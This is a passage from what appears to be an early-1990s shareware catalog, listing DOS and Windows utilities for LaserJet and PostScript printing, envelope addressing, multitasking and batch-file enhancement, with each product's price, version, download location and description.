stock from any printer. + + Product: BOOKLET [***] + Needs: IBM PC, DOS 3.3 or better. HP LaserJet or DeskJet + printer. + Author: Sympathetic Software + Registration: $20.00 + Registration benefits: Master disks, free upgrading. + Version: 3.7 (10-23-91) + User benefits: Master disks, free upgrading. + Look for: BOOKLT36.ZIP on BBSs (call 714-730-6743 to download it + at no charge); BOOKLT.EXE in ZNT:UTILFORUM forum LIB 14 on + CompuServe. + Download size: 50k + Description: + Creates PC Booklet sized documents from full page documents. + Prints four pages of the document on each sheet of paper. The + pages are printed "half size" on the right and left halves of + both sides of the sheet turned sideways. Handles A4, LETTER, + LEGAL, and EXEC paper. Also prints single sided. + + Converts word processor HPPCL output to fit the reduced size. + Formatting is preserved. Extensive error recovery allows + restart after jams or other printing failures. Command line + interface. + + Chapter 2, "Utilities" 56 + + + + Product: BOOKLET-SCREEN [***] + Needs: IBM PC, DOS 3.3 or better. HP LaserJet or DeskJet + printer. + Author: Sympathetic Software + Registration: $20.00 + Registration benefits: Master disks, free upgrading. + Version: 1.4 (10-23-91) + User benefits: Master disks, free upgrading. + Look for: BOOKLS13.ZIP on BBSs (call 714-730-6743 to download it + at no charge); BOOKLS.EXE in ZNT:UTILFORUM forum LIB 14 on + CompuServe. + Download size: 125k + Description: + Creates PC Booklet sized documents from full page documents. + Prints four pages of the document on each sheet of paper. The + pages are printed "half size" two pages per side of the paper + turned sideways. Handles A4, LETTER, LEGAL, and EXEC paper. + Also prints single sided. + + Converts word processor HPPCL output to fit reduced size. + Formatting is preserved. Extensive error recovery allows + restart after jams or other failures. Menu/Screen interface + with online help. + + Product: DMPLAS (Dot Matrix to LaserJet) + Needs: IBM PC, DOS 2.0 or better. 6k RAM. + Author: Software Co-op, 317-856-6052 + Registration: $32.00 + Registration benefits: Printed manual, latest version on disk, + BBS/phone/mail support, notice of updates. + Version: 1.0 (08-15-91) + User benefits: Printed manual, latest version on disk, BBS/phone/ + mail support, notice of updates. + Look for: DMPLAS??.ZIP (multiple files) on BBSs (call + 317-856-2087 to download it at no charge); DMPLS*.ZIP in IBMHW + forum LIB 2 (multiple files) on CompuServe. + Download size: 225k + Description: + Small TSR (6k) captures and translates IBM/Epson FX output for + the HP LaserJet. Works with both text and graphics programs + (including GRAPHICS.COM). + + Uses native LaserJet (or compatible) fonts or your softfonts. + Optional Courier italic and proportional fonts are also + included. + + Prints at accurate scale (for filling in forms) or slightly + reduced vertical spacing to print 66 lines per page. Graphics + can also be slightly compressed to fit on the LaserJet's 10" + page. + + Chapter 2, "Utilities" 57 + + + + Product: DOWNLOAD [***] + Needs: IBM PC, DOS 2.1 or better. HP LaserJet or DeskJet + printer. + Author: TaxWare, 801-373-0541 + Registration: $9.95 + Registration benefits: Mail support, product discounts. + Version: 1.1 (04-22-91) + User benefits: Mail support, product discounts. + Look for: DOWNLD.ZIP on BBSs; DOWNLD.ZIP in IBMHW forum LIB 4 on + CompuServe. + Download size: 45k + Description: + DOWNLOAD sends soft fonts and macros to the memory of + your LaserJet or DeskJet printer. + UNLOAD frees up the memory taken by soft fonts and + macros. + + Product: ESF's European LaserJet Fonts + Needs: IBM PC, DOS 2.1 or better. HP LaserJet II printer. + Author: Elfring Soft Fonts, 708-377-3520 + Registration: $25.00 + Registration benefits: Telephone support. + Version: 1.0 (05-20-91) + User benefits: Telephone support. + Look for: availability unknown on BBSs; ELFNT1.ZIP in HP forum + LIB 4 (multiple files) on CompuServe. + Download size: 330k + Description: + A collection of 12 soft fonts print in any western European + language. They work on any HP LaserJet II or better printer and + offer: English, German, French, Spanish, etc. Printer drivers + are included for WordPerfect 5.0 & 5.1, MS Word 5.X, MS Works, + Ventura, and Windows 3.0. Utilites are included that will + download the fonts and print sample sheets of them. All fonts + have the PC-850 symbol set and include: Helv, Roman, & Garamond + in 12 point medium/bold/italic + 18 point bold. New tutorial on + fonts. + + Product: ESF's LaserJet Fonts & Util. + Needs: IBM PC, DOS 2.1 or better. HP LaserJet printer. + Author: Elfring Soft Fonts, 708-377-3520 + Registration: $25.00 + Registration benefits: Telephone support. + Version: 1.5 (07-10-91) + User benefits: Telephone support. + Look for: availability unknown on BBSs; LJFNT4.ZIP in HP forum + LIB 4 (multiple files) on CompuServe. + Download size: 330k + Description: + Collection of 21 soft fonts for HP LaserJet or compatible + printers. Includes printer drivers for WordPerfect 5.0 & 5.1, + MS Word 5.X, MS Works, Ventura, & Windows. Utility programs + include DOWNLOAD, DISPFONT, & FONTINFO. Fonts include: Helv & + Roman 10 & 12 point medium/bold/italic, Helv & Roman 18 point + + Chapter 2, "Utilities" 58 + + + + bold, 12 point Century Legal, Script, Flourish, 18 point + Broadway & Dingbats, 10 point KeyCaps, 10 point Greek. Easy + INSTALL program to unpack fonts and new tutorial on soft fonts. + + Product: LaserForm + Needs: IBM PC, DOS 3.0 or better. 640k RAM, VGA monitor, mouse, + HP LaserJet printer. Scanner optional. + Author: Real Software, 408-476-3550 + Registration: $39.00 + Registration benefits: Lastest disk, printed manual, support. + Version: 1.00 (07-01-91) + User benefits: Lastest disk, printed manual, support. + Look for: LFORMS.ZIP on BBSs (call 408-476-1055 to download it at + no charge); LFORMS.ZIP in IBMAPP forum LIB 6 on CompuServe; + LFORMS.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 200k + Description: + A tool for printing existing databases on existing forms. It + is a WYSIWYG program to match your output with your form, and a + printer driver which formats on the fly from your database or + other program. + + Product: LASR-MAN + Needs: IBM PC, DOS 3.0 or better. HP LaserJet printer. + Author: Micrometric, 813-377-2515 + Registration: $30.00 + Registration benefits: Printed & bound 7'x8.5' manual, one yr. + phone/mail support, next release notification. + Version: 2.11 (05-24-91) + User benefits: Printed & bound 7'x8.5' manual, one yr. phone/mail + support, next release notification. + Look for: LASR@211.ZIP on BBSs. + Download size: 238k + Description: + Laser printer utility for ASCII files with sixteen styles; + portrait or landscape orientation with 10, 12 or 16 characters/ + inch (cpi) printing on one or both sides of each sheet; + landscape orientation at 16 cpi, two 72 lines pages on one + side, four pages both sides; booklet (single files) or manual + (multiple files are treated as chapters). Configuration files + allow printing on legal size paper or non-HP printers. + + Chapter 2, "Utilities" 59 + + + + Product: LJ-SLEEVE + Needs: IBM PC, DOS 3.0 or better. HP LaserJet printer or + compatible. + Author: JMJ Software, 704-525-1472 + Registration: $14.95 + Registration benefits: One year mail/CIS support, printed manual. + Version: 1.0 (03-31-92) + User benefits: One year mail/CIS support, printed manual. + Look for: LJSLEV.ZIP on BBSs; LJSLEV.ZIP in HPPER forum LIB 4 on + CompuServe; LJSLEV.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 25k + Description: + Just slip a floppy disk in Drive A or Drive B, load this easy- + to-use program, and in just seconds your LaserJet or compatible + printer will print out a sleeve template containing the names + of all the files (date and size for each file, too). Just cut + it out, fold back the flaps and tape or glue, and you have a + storage sleeve for your 51/4" & 31/2" disks. + + Product: LJ2DJ [***] + Converts LaserJet fonts to DeskJet fonts. See full description + on page 53. + + Product: LJLAND [***] + Needs: IBM PC, DOS 2.1 or better. HP LaserJet printer. + Author: TaxWare, 801-373-0541 + Registration: $29.95 + Registration benefits: Printed manual, master disks, phone/mail + support. + Version: 3.04 (02-07-92) + User benefits: Printed manual, master disks, phone/mail support. + Look for: LJLND.ZIP on BBSs; LJLND.ZIP in IBMHW forum LIB 2 on + CompuServe. + Download size: 101k + Description: + Prints text files across the length of the page in 1 or more + columns. Print program listings, spreadsheets, databases, user + manuals, and other formatted text files. By default, the + printer's internal 8.5 point Line Printer font is used to yield + 2 66-line, 80-character columns per each side of the paper. + Options include intelligent word wrap, net jobs, headers, + titles, redirection, page/line ranges, binder formats, + environment variable, copies, alternate font, wildcards, + margins, greenbar. + + Product: Mail Machine [***] + Print Envelopes and Labels on all LaserJets. See full + description on page 64. + + Chapter 2, "Utilities" 60 + + + + Product: Over_LAZ + Needs: IBM PC, DOS 2.0 or better. WordPerfect 5.0 or later. HP + LaserJet II printer. + Author: Herne Data Systems Ltd, 519-366-2732 + Registration: $25.00 + Registration benefits: Free personalized letterhead overlay. + Additional personal letterheads also available. + Version: 2 (02-14-92) + User benefits: Free personalized letterhead overlay. Additional + personal letterheads also available. + Look for: availability unknown on BBSs; OVER2.ZIP in IBMAPP forum + LIB 2 on CompuServe. + Download size: 276k + Description: + A collection of over 75 printer overlay files for WordPerfect + 5.0 or later and an HP LaserJet compatible printer. Over_LAZ + are provided for standard office forms (inter office memo, FAX + transmittal, etc) as well as 'rubber stamps' (draft, + confidential, etc) and decorative page borders. + + Over_LAZ are automatically printed on the page by WordPerfect + over your document. Extra fonts are not required. 512k + printer RAM is sufficient. + + Product: PCX2FNT [***] + Needs: IBM PC, DOS 2.1 or better. HP LaserJet printer. + Author: TaxWare, 801-373-0541 + Registration: $29.95 + Registration benefits: Printed manual, master disks, phone/mail + support, bonus utilities. + Version: 1.1 (03-29-92) + User benefits: Printed manual, master disks, phone/mail support, + bonus utilities. + Look for: 2FNT.ZIP on BBSs; 2FNT.ZIP in HPPER forum LIB 4 on + CompuServe. + Download size: 145k + Description: + Convert PCX format images (logos, signatures, letterhead) that + you've scanned, painted or drawn into HP format soft fonts. + Download to your printer and easily access from within your + word processor, or just about any other printing application. + Converting often printed graphics (such as your signature on + several letters or your logo on several envelopes) into soft + fonts will also greatly speed up your printing. + + Chapter 2, "Utilities" 61 + + + + Product: PCX2PCL [***] + Needs: IBM PC, DOS 2.1 or better. HP LaserJet printer. + Author: TaxWare, 801-373-0541 + Registration: $29.95 + Registration benefits: Printed manual, master disks, phone/mail + support. + Version: 1.4 (01-01-92) + User benefits: Printed manual, master disks, phone/mail support. + Look for: 2PCL.ZIP on BBSs; 2PCL.ZIP in HPPER forum LIB 4 on + CompuServe. + Download size: 60k + Description: + Convert PCX format files to HP PCL format for downloading to + LaserJet printers as macros. Use your scanner, or paint or + draw program to turn your logo, signature, letterhead or other + PCX graphic into a LaserJet printer macro. Significantly + improves the speed of your printing, especially when printing + several documents which contain common graphics, such as a + signature. + + Product: QFont + Needs: IBM AT (80286), DOS 2.1 or better. Hercules or EGA + monitor. Mouse. + Author: Jamestown Software, 608-271-2090 + Registration: $80.00 + Registration benefits: Printed manual and disk; phone/BBS/ + newsletter support. + Version: 1.5 (10-20-90) + User benefits: Printed manual and disk; phone/BBS/newsletter + support. + Look for: QFONT*.* on BBSs (call 608-271-3685 to download it at + no charge); QFONT.* in IBMSYS forum LIB 7 on CompuServe. + Download size: 150k + Description: + Graphic "paint" program to edit and create HP Laserjet + downloadable soft fonts. Has complete editing functions -- cut + and paste, circle, curves, arcs, lines, rectangles, fills and + so on -- plus powerful transformation functions such as shadow, + outline, bolden, lighten, slant and resize. Modify font + headers. Test spacing. Download fonts with sample printouts. + Change mono spaced fonts to proportional and vice versa. Use + fonts in DTP programs like Ventura, or wordprocessors such as + WordPerfect. + + Product: TSR Download + Soft font manager for LaserJet & DeskJets. See full + description on page 46. + + 2.4.3.4 PostScript + + Product: The Laughing Dog Screen Maker [***] + Text-mode Screen Designer w/Code Generation. See full + description on page 285. + + Chapter 2, "Utilities" 62 + + + + Product: Over_LAZ PS + Needs: IBM PC, DOS 2.0 or better. WordPerfect 5.0 or later. + PostScript printer. + Author: Herne Data Systems Ltd, 519-366-2732 + Registration: $25.00 + Registration benefits: Free personalized letterhead overlay. + Additional personal overlays available. + Version: 2 (02-14-92) + User benefits: Free personalized letterhead overlay. Additional + personal overlays available. + Look for: availability unknown on BBSs; OVERPS.ZIP in IBMAPP + forum LIB 2 on CompuServe; OVERPS.ZIP in IBMPC RTC LIB 0 on + GEnie. + Download size: 117k + Description: + A collection of over 70 printer overlay files for WordPerfect + 5.0 or later and a PostScript compatible printer. Over_LAZ are + provided for standard office forms (inter office memo, FAX + transmittal, etc) as well as rubber stamps (draft, + confidential, etc) and decorative page borders. Over_LAZ PS are + automatically printed on the page by WordPerfect over your + document. + + Product: PM2LINO + Needs: IBM PC, DOS 3.0 or better. PageMaker PC PostScript files. + Author: JMJ Software, 704-525-1472 + Registration: $0.00 + Registration benefits: One year CompuServe/mail support. + Version: 1.0 (03-01-92) + User benefits: One year CompuServe/mail support. + Look for: PM2LINO.ZIP on BBSs; PM2LIN.ZIP in DTPFORUM forum LIB 6 + on CompuServe. + Download size: 9k + Description: + This utility removes Control-D characters from print-to-file + PostScript files created by PC PageMaker for later output by + Linotronic or other imagesetters driven by Mac systems. Failure + to remove these characters results in failure to output files + on imagesetter. This utility is command line driven and + supports DOS wildcards. + + Chapter 2, "Utilities" 63 + + + + Product: PS-SLEEVE + Needs: IBM PC, DOS 3.0 or better. PostScript printer set up on + LPT1, LPT2 or LPT3. + Author: JMJ Software, 704-525-1472 + Registration: $14.95 + Registration benefits: Printed manual, one year CompuServe/mail + support. + Version: 2.0 (03-01-92) + User benefits: Printed manual, one year CompuServe/mail support. + Look for: SLEEVE.ZIP on BBSs; SLEEVE.ZIP in DTP forum LIB 6 on + CompuServe; SLEEVE.ZIP in PSRT RTC LIB 1 on GEnie. + Download size: 26k + Description: + Print 51/4" or 31/2" floppy disk storage sleeves on your PostScript + printer. Just insert a floppy disk in Drive A or B and print a + sleeve template on your printer containing up to 192 file names + in all subdirectories on the floppy. Cut it apart, tape or + glue the flaps, and you're done. Don't get writer's cramp + writing all those tiny file names. Use PS-SLEEVE instead. + + Product: PS-TEXT + Needs: IBM PC, DOS 3.0 or better. + Author: JMJ Software, 704-525-1472 + Registration: $0.00 + Registration benefits: One year free support by mail or CIS. + Version: 1.0 (08-01-91) + User benefits: One year free support by mail or CIS. + Look for: PSTEXT.ZIP on BBSs; PSTEXT.ZIP in ADOBE forum LIB 3 on + CompuServe. + Download size: 13k + Description: + Extracts all text from a print-to-file PostScript file to a new + file in ASCII format for re-formatting. Text comes in without + any formatting. Program operates from command line (typing + PSTEXT alone lists required parameters). + + 2.4.4 Envelope addressers + + Product: DJ-LOPE + Envelope Printer/Database for DeskJet printer. See full + description on page 51. + + Chapter 2, "Utilities" 64 + + + + Product: GRAB Plus(r) + Needs: IBM PC, DOS 3.0 or better. Any printer that will hold an + envelope. + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Registration: $49.95 + Registration benefits: Printed manual, master disks, one year + mail support, 900# phone support. + Version: 6.1 (09-20-91) + User benefits: Printed manual, master disks, one year mail + support, 900# phone support. + Look for: GRAB*.ZIP (multiple files) on BBSs; GRAB*.ZIP in IBMAPP + forum LIB 2 (multiple files) on CompuServe; GRAB*.ZIP in IBMPC + RTC LIB 5 (multiple files) on GEnie. + Download size: 444k + Description: + This 6k TSR will capture the name and address from your + favorite word processor and send it formatted to an envelope in + your printer. Works on any printer that will hold an envelope + or label. Uses special features of LaserJet, DeskJet, and + PostScript printers. Prints the postal bar codes on your ZIP+4 + zip codes in the address. Includes GRABDB, a database for + storing thousands of names and addresses. Also includes + LaserLabel, a powerful label printing program. + + Product: GRAB Plus(r) for Windows + Needs: IBM PC, Windows 3.0 or better. Any printer that will hold + an envelope. + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Registration: $49.95 + Registration benefits: Printed manual, master disks, one year + mail support, 900# phone support. + Version: 1.3 (09-20-91) + User benefits: Printed manual, master disks, one year mail + support, 900# phone support. + Look for: WINGRAB.ZIP on BBSs; WINGRA.ZIP in IBMAPP forum LIB 2 + (multiple files) on CompuServe; WINGRAB.ZIP in IBMPC RTC LIB 5 + (multiple files) on GEnie. + Download size: 388k + Description: + This is the Microsoft Windows version of the GRAB Plus(r) + envelope addressing system. Prints the name and address from + within your Windows application specially formatted for your + printer. Prints postal barcodes on LaserJet, DeskJet, and + PostScript printers. Comes with macros to attach to Word for + Windows and Ami Professional. See GRAB Plus(r) in this catalog + also. Use on multiple printers for both envelopes and labels. + + Product: Label Master [***] + PC Magazine Editors Choice mailing list prog. See full + description on page 159. + + Chapter 2, "Utilities" 65 + + + + Product: Mail Machine [***] + Needs: IBM PC, DOS 2.1 or better. HP LaserJet printer. + Author: TaxWare, 801-373-0541 + Registration: $49.95 + Registration benefits: Printed manual, master disks, phone/mail + support. + Version: 3.0k (03-12-92) + User benefits: Printed manual, master disks, phone/mail support. + Look for: availability unknown on BBSs; MM30.ZIP in HPPER forum + LIB 4 on CompuServe. + Download size: 250k + Description: + The most flexible envelope and label printing system ever + developed for HP LaserJet printers. It will print envelopes and + labels of any size acceptable by your printer. Standard size + templates are predefined; custom size labels and envelopes are + user-defineable. Up to 6 lines of text in the TO and FROM + addresses - typed by you or imported from database files. + Prints USPS PostNet barcodes; supports all fonts - internal, + cartridge & soft; allows PCX graphics, misc. messages; saves + jobs + + Product: Plain Vanilla Labels + Simple but complete label printer. See full description on + page 161. + + Product: PrintEnvelope + Needs: IBM PC, Windows 3.0 or better. VBRUN100.DLL. + Author: Maurer Associates, 914-562-6600 + Registration: $30.00 + Registration benefits: Registered disk, upgrade notification. + Version: 2.30 (03-04-92) + User benefits: Registered disk, upgrade notification. + Look for: ENVELOPE.ZIP on BBSs; ENVELO.ZIP in WINADV forum LIB 1 + on CompuServe; PRENV230.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 78k + Description: + A complete Windows 3.x mail addressing system. Print envelopes + or labels of any size. Use different fonts for the addressee, + note text and return address or use a Windows .BMP graphic as + the return address. Type addresses on the fly, paste from + other applications, use an address book or import a mail list + in Windows Carfile or ASCII file format. Will do USPS approved + PostNet bar codes. Supports laser, dot matrix and PostScript + printers and automatically sets orientation and selects paper + bins. + + Product: Public Address + High-performance compact Address database. See full + description on page 161. + + Chapter 2, "Utilities" 66 + + + + 2.5 System Utilities + + 2.5.1 Operating systems + + Product: 4FILES + File manager & annotator for 4DOS & NDOS. See full description + on page 108. + + Product: AutoCon + Autoexec/Config reconfiguration manager. See full description + on page 74. + + Product: VMiX 386 + Needs: IBM PC, DOS 3.1 or better. DOS 5.0 and 80386 recommended. + Author: Commercial Software Associates (ComSoft), 714-720-1214 + Registration: $59.00 + Registration benefits: Printed manual, Applications Programming + Interface, BBS support. + Version: 2.67 (12-20-91) + User benefits: Printed manual, Applications Programming + Interface, BBS support. + Look for: VMIX267.EXE on BBSs (call 714-720-1139 to download it + at no charge); VMIX.EXE in IBMSYS forum LIB 4 on CompuServe. + Download size: 180k + Description: + A multitasker and multiuser Protected Mode Dos Extender + environment for IBM (PC, XT, AT, EISA, PS/2) compatibles. + Automatically configures itself to your environment. + + In 8086 and 286 computers, it will multitask using only + available conventional memory with task swapping to extended + memory, where available. On 386 computers each virtual task + gets its own screen and 640KByte partition from extended + memory. Up to 4 users at the COMM ports. + + 2.5.2 Multi-OS utilities + + Product: BootMaster [***] + Boot Configuration Manager. See full description on page 75. + + Chapter 2, "Utilities" 67 + + + + 2.5.3 Command processors + + Product: 4DOS + Needs: IBM PC, DOS 2.0 or better. + Author: JP Software Inc., 617-646-3975 + Registration: $69.00 + Registration benefits: Typeset quality printed manual, free or + low-cost upgrade to next major release, newsletter, technical + support. + Version: 4.0 (08-26-91) + User benefits: Typeset quality printed manual, free or low-cost + upgrade to next major release, newsletter, technical support. + Look for: 4DOS4*.ZIP on BBSs (call 617-354-8873 to download it at + no charge); 4DOS4*.ZIP in PCVENB forum LIB 10 (multiple files) + on CompuServe. + Download size: 450k + Description: + Replaces COMMAND.COM for MS-DOS, PC-DOS, and DR-DOS. Enhances + most DOS commands, over 40 new commands. Command editing, + history, aliases, point-and-shoot file selection, high-speed + batch files, much much more. 1989 PC Mag Tech Excellence + Finalist (ver. 2.21). Compatible with COMMAND.COM and + virtually all PC hardware and software. Easy installation and + configuration, network-compatible. If you use DOS then you + already know how to use 4DOS. If you want more from DOS you + need 4DOS! + + Product: CM_FILER + Multi-Function Disk/File Manager. See full description on + page 109. + + Product: HDM IV - Hard Disk Menu + DOS Menu & Security System, Network Support. See full + description on page 102. + + Product: VMiX 386 + MSDOS MultiTasker MultiUser for 8086 to 486. See full + description on page 66. + + Product: WinBatch + Windows Batch Language. See full description on page 73. + + 2.5.4 Batch & macro utilities + + Product: 4DOS + Enhanced DOS command processor. See full description on + page 67. + + Chapter 2, "Utilities" 68 + + + + Product: BATUTIL + Needs: IBM PC, DOS 2.0 or better. + Author: CTRLALT Associates + Registration: $43.00 + Registration benefits: Printed manual; CompuServe support. + Version: 4.0 (12-23-91) + User benefits: Printed manual; CompuServe support. + Look for: availability unknown on BBSs; SKEY??.ZIP in IBMSYS + forum LIB 3 on CompuServe. + Download size: 350k + Description: + Lets you spiff up your batch files with accesss to hardware + information, display of text in color and/or large letters, pop + up menus and file lists. You can directly access the + environment and have paths up to 255 characters long. + + PC Magazine called it the 'ultimate batch enhancer' and PC + World and PC Computing included it in "Best of.." articles. + + Version 4.0 has a full fledged language with if..then, case, + etc. + + Product: Bmenu + Pop-up menu program for batch files. See full description on + page 100. + + Product: Command Post + Programmable Shell/File Mgr. for Windows 3.0. See full + description on page 112. + + Product: DOS Extensions for Professional + A cohesive pkg of 7 powerful disk utilities. See full + description on page 13. + + Product: ENVI-MAN + Needs: IBM PC, DOS 3.0 or better. + Author: Micrometric, 813-377-2515 + Registration: $15.00 + Registration benefits: Printed & bound 7'x8.5' manual, one year + phone/mail support, next release notification. + Version: 1.00 (04-26-91) + User benefits: Printed & bound 7'x8.5' manual, one year phone/ + mail support, next release notification. + Look for: ENVI@100.ZIP on BBSs. + Download size: 138k + Description: + An environment utility that accomplishes two major function. + First - display all current environment strings and data about + the environment such as the location, size and space + availability of the Master environment. Second - let a batch + file know how much environment space is currently available and + to provide a graceful exit if there isn't enough. It may also + show under certain circumstances the size of the master + + Chapter 2, "Utilities" 69 + + + + environment can be expanded without changes being made to + CONFIG.SYS. + + Product: EXTENDED BATCH LANGUAGE-PLUS! + Needs: IBM PC, DOS 2.0 or better. + Author: Seaware Corp., 407-738-1712 + Registration: $79.00 + Registration benefits: Printed manual, master disks, six months + phone/BBS/newsletter support. + Version: 4.07 (07-01-91) + User benefits: Printed manual, master disks, six months phone/ + BBS/newsletter support. + Look for: EBL.ZIP on BBSs (call 407-738-1843 to download it at no + charge); EBL*.ZIP in IBMSYS forum LIB 1 on CompuServe. + Download size: 100k + Description: + Makes your batch files hum! It adds professional extensions to + existing MS-DOS batch files to: + * Integrate and automate programs to work together + * Speeds batch files up to 5 times faster + * Adds structured IF, REPEAT, WHILE, BEGIN/END commands + * Create menus automatically + * Design professional user interfaces (windows, several menu + types, sound, and more) + * Adds over 100 commands, functions, and expression types. + + Using batch files will never be the same! + + Product: Getkey/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $10.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.00 (02-25-90) + User benefits: Eligibility for free upgrades. + Look for: GETKO100.ZIP on BBSs; GETKO1.ZIP in IBMSYS forum LIB 2 + on CompuServe. + Download size: 8k + Description: + Reports the ASCII code of a user keystroke as an ERRORLEVEL. + Great for getting user menu selections or input during batch + files. Options for checking input against edit mask, making + use press Enter, flushing keyboard buffer before accepting + keystroke, hiding cursor, disabling ^C & ^Break, capitalizing + the key, echoing it to the screen, and beeping after invalid + input. + + Product: LOGIK MENU + Menu System, 43/50 lines, Mouse, Events, Log. See full + description on page 103. + + Chapter 2, "Utilities" 70 + + + + Product: MENU-MAN + Needs: IBM PC, DOS 3.0 or better. + Author: Micrometric, 813-377-2515 + Registration: $15.00 + Registration benefits: Printed & bound 7'x8.5' manual, one yr. + phone/mail support, next release notification. + Version: 1.21 (05-24-91) + User benefits: Printed & bound 7'x8.5' manual, one yr. phone/mail + support, next release notification. + Look for: MENU@121.ZIP on BBSs. + Download size: 163k + Description: + Allows the display of user selection menus from within batch + files. These menus are controlled by command line options and + can contain a title and up to nineteen selection option lines + that are generated from REM lines in the batch file which + follows the call to MENU-MAN. Options include a user response + time limit, menu positioning, erasing the screen before/after + menu display, and menu sound, color and type customization. + + Product: Painless Event Processor + Needs: IBM PC, DOS 2.1 or better. 128k RAM. + Author: Painless Accounting, 800-521-9905 + Registration: $45.00 + Registration benefits: Registered users receive the latest copy + of the program, along with a printed and bound manual. Also + receive major discounts on updates. + Version: 1.01 (05-31-91) + User benefits: Registered users receive the latest copy of the + program, along with a printed and bound manual. Also receive + major discounts on updates. + Look for: PEP.ZIP on BBSs (call 214-881-0313 to download it at no + charge); PEP.ZIP in IBMSYS forum LIB 3 on CompuServe; PEP.ZIP + in IBM RTC LIB 3 on GEnie. + Download size: 100k + Description: + A revolutionary concept in computer software. Allows your PC to + work 24 hours a day. Simply tell the processor when to execute + programs, batch files, utilities, tasks, etc. and at the + specified time the keystrokes will be tnered into your computer + as if you were sitting at the keyboard. TSR requiring 10K. + Great for nightly backups, speed disk, and countless other + processes. + + Chapter 2, "Utilities" 71 + + + + Product: PALERT + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Registration benefits: Latest version and updates. $45 gets + package of 8 utilities & bound manual. + Version: 2.3 (06-12-91) + User benefits: Latest version and updates. $45 gets package of 8 + utilities & bound manual. + Look for: PALERT23.ZIP on BBSs (call 714-352-2825 to download it + at no charge); PALERT.ARC in IBMSYS forum LIB 3 on CompuServe. + Download size: 27k + Description: + A batch file utility designed to check your disk freespace + before starting an application. Specify how much disk + freespace you need for a program and let PALERT insure it + exists before starting an application. Dont be caught in your + wordprocessor or spreadsheet with a file that is too big to be + saved. Put PALERT in your AUTOEXEC.BAT file to warn you when + your hard disk is getting full. Presents a graphical + representation of space to let you quickly determine freespace + levels. + + Product: PATH-MAN + Needs: IBM PC, DOS 3.0 or better. + Author: Micrometric, 813-377-2515 + Registration: $10.00 + Registration benefits: Printed & bound 7'x8.5' manual, one yr. + phone/mail support, next release notification. + Version: 1.10 (05-24-91) + User benefits: Printed & bound 7'x8.5' manual, one yr. phone/mail + support, next release notification. + Look for: PATH@110.ZIP on BBSs. + Download size: 136k + Description: + A utility that searches the directory path elements of the PATH + statement for a given file. The search file name may include + DOS wildcard characters. The ERRORLEVEL variable is set, based + on the results of this search, to allow more user friendly + batch files - a graceful exit can be made when needed data + files or programs are missing. Optionally, the path ele-ment on + which the search file is located may be displayed. + + Chapter 2, "Utilities" 72 + + + + Product: PDAILY + Needs: IBM PC, DOS 2.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $10.00 + Registration benefits: Current version and future updates. $45 + gets 8 utility set with bound manual. Money Back gurantee. + Version: 1.0 (08-18-90) + User benefits: Current version and future updates. $45 gets 8 + utility set with bound manual. Money Back gurantee. + Look for: PDAILY.ZIP on BBSs (call 714-352-2825 to download it at + no charge); PDAILY.ARC in IBMSYS forum LIB 3 on CompuServe. + Download size: 11k + Description: + Lets users execute one or more DOS batch commands once per day. + Use it when you execute a batch command multiple times per day + but want selected commands to execute only once. For instance + backup or disk cleanup. Can be implemented in your + AUTOEXEC.BAT file. Part of the Patriquin Utilities. + + Product: PowerBatch Compiler + Needs: IBM PC, DOS 2.0 or better. + Author: CSD, Inc., 404-740-9583 + Registration: $30.00 + Registration benefits: Latest version of the compiler and + documentation. Notification of updates. + Version: 1.4j (05-08-91) + User benefits: Latest version of the compiler and documentation. + Notification of updates. + Look for: availability unknown on BBSs; PWRBAT.EXE in IBMSYS + forum LIB 1 on CompuServe. + Download size: 140k + Description: + A dynamic new batch command compiler which provides the + capability of creating standalone executable modules (.EXE) + with speed and security. Standard batch functions are enhanced + with over 40 additional commands for FLEXIBILITY never before + available in a batch command file. Modules run with the SPEED + only compiled programs can achieve. Maximum SECURITY can be + acheived by creating modules that cannot be terminated by + pressing any break key. + + Chapter 2, "Utilities" 73 + + + + Product: Probat + Needs: IBM PC, DOS 2.0 or better. + Author: Mark Tigges, 604-926-0366 + Registration: $35.00 + Registration benefits: Technical assistance and discounted + upgrades. + Version: I (09-11-88) + User benefits: Technical assistance and discounted upgrades. + Look for: DOPPLER (multiple files) on BBSs (call 604-277-9970 to + download it at no charge). + Download size: 480k + Description: + This program has revolutionized the way complex batch files are + built. This sophisticated program gives you the power to create + batch files with chaining screens, graphic screen layout, + keyboard input acceptance, and informational prompting. Lets + you draw boxes, set screen colors, and create menues. There is + even a handsome graphics menu screen you can integrate into + your batch files. Though it takes some time to learn, the + results are the most professional batch files possible. + + Product: STACKEY + Keystroke stacking utility. See full description on page 42. + + Product: Utility_Belt + Needs: IBM PC, DOS 3.0 or better. + Author: Herne Data Systems Ltd, 519-366-2732 + Registration: $25.00 + Registration benefits: Technical support, upgrades. + Version: 1.1a (02-14-92) + User benefits: Technical support, upgrades. + Look for: availability unknown on BBSs; BELT1A.ZIP in IBMSYS + forum LIB 3 on CompuServe; BELT1A.ZIP in IBMPC RTC LIB 0 on + GEnie. + Download size: 59k + Description: + A collection of 18 utilities designed to simplify the creation + of professional looking DOS .BATch files. Six interactive + utilities (SELECT, CONFIRM, WAIT, GETKEY, SLEEP, BLEEP) accept + user input. Nine video utilities add pizzazz to displays and + allow full access to all video text pages on CGA, EGA and VGA + system (VPAT, VPCLS, VPFLIP, VPTNT, VPSET, VPBH, VPSTRIPE, + VPBOX, VPCOPY). Three security and diagnostic utilities + (REBOOT, HANG, WHATIS) are also included. + + Chapter 2, "Utilities" 74 + + + + Product: WinBatch + Needs: IBM PC, Windows 3.0 or better. + Author: Wilson WindowWare, Inc., 206-937-9335 + Registration: $69.95 + Registration benefits: Printed manual, tech support, 90-day money + back gaurantee. + Version: 3.0A (02-15-91) + User benefits: Printed manual, tech support, 90-day money back + gaurantee. + Look for: WBT30A.ZIP on BBSs (call 206-935-5198 to download it at + no charge); WBT30A.ZIP in WINAPA forum LIB 15 on CompuServe. + Download size: 180k + Description: + A Windows batch language interpreter which brings the power of + batch language programming to the Windows environment. Can do + pretty much everything the old DOS batch files can do, but it + goes far beyond the capabilities of the DOS batch language. + Can run Windows and 